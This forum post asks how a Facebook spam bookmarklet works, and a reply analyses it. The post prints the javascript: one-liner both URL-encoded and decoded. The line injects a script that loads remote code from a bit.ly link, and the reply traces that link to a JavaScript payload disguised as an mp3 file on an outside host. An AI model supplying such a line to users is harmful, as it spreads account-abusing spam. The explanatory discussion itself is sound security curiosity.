So, I've just seen this spam code on Facebook, written in JavaScript and I wondered if someone could explain to me how the code works, and interacts with Facebook. I do not intend to use this for malicious purposes, but I am simply interested in the security of websites like Facebook. Here is the code that is executed from the address bar (I suggest not trying it yourself, you may end up with a few annoyed friends).
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
Check it here, the link is url encoded.:
http://meyerweb.com/eric/tools/dencoder/
javascript:
a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)
From what I see: load this url as a script and add it to the current page.
Edit: The script loaded is placed at this url: http://www.raxarstudios.com/x/audiotrack2.mp3
It's masqueraded as a mp3 song, but it's just javascript: http://pastebin.com/RVmNVtt9 I've quickly glanced at it, it apparently uses some heavy ajax to add events and to join yourselve to it.